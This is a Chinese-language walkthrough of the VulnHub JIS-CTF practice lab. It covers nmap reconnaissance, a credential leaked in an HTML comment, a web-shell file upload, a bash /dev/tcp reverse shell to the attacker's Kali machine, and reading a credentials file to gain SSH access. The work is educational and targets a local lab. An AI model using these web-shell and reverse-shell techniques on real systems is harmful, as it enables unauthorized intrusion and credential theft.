vulnhub - JIS-CTF
vulnhub - JIS-CTF
这个靶场一共有5个flag
信息收集
靶机ip:192.168.157.172
kali ip:192.168.157.161
nmap 192.168.157.0/24
nmap -sT --min-rate 10000 -p- 192.168.157.172
sudo nmap -sT -sV -sC -O -p22,80 192.168.157.172
一眼看到robots.txt
User-agent: *
Disallow: /
Disallow: /backup
Disallow: /admin
Disallow: /admin_area
Disallow: /r00t
Disallow: /uploads
Disallow: /uploaded_files
Disallow: /flag
flag1
访问/flag
The 1st flag is : {8734509128730458630012095}
flag2
访问/admin_area
<!-- username : admin
password : 3v1l_H@ck3r
The 2nd flag is : {7412574125871236547895214}
-->
登录后就是文件上传区,一句话木马连蚁剑,图片路径在/uploaded_files
flag3
找到hint.txt
flag.txt现在不可读,看提示应该先用ssh登入technawi账户
还是个root权限账户
这个文件也很可疑,但是大小是0b,应该只是个提示文件
先反弹shell
kali
nc -lnvp 9999
蚁剑终端
bash -c 'bash -i >& /dev/tcp/192.168.157.161/9999 0>&1'
flag4
一般情况来说,root下的flag是最终的flag5,所以还有flag4没有找到
grep -sr "The 4th flag is" /etc
顺便看一下这个文件
www-data@Jordaninfosec-CTF01:/var/www/html/uploaded_files$ cat /etc/mysql/conf.d/credentials.txt
<1:/var/www/html/uploaded_files$ cat /etc/mysql/conf.d/credentials.txt
The 4th flag is : {7845658974123568974185412}
username : technawi
password : 3vilH@ksor
拿到ssh密码
flag5
登录后cat flag
通关
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通